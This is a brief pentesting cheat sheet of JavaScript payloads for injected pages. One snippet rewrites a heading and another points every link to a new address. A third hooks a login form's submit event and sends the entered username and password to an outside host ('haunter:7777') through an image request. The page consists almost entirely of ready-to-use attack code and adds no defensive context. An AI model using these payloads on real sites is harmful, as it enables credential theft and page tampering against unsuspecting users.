Javascript for Pentesters
=========================

Modify HTML
-----------

```javascript
document.querySelector("body > div > h1").innerText = "Find you!"
```

Change All Links
----------------

```javascript
document.querySelectorAll("a").forEach(function(item){item.setAttribute("href", "https://www.google.com")})
```

Hijack Form Submit
------------------

```javascript
document.querySelector("body > div > form").addEventListener("submit", function(e){const username = document.querySelector("body > div > form > input:nth-child(2)").value;const password = document.querySelector("body > div > form > input:nth-child(3)").value;new Image().src = ("http://haunter:7777/?username=" + username + "&password=" + password);w = window.open("","","width=1,height=1");w.close();})
```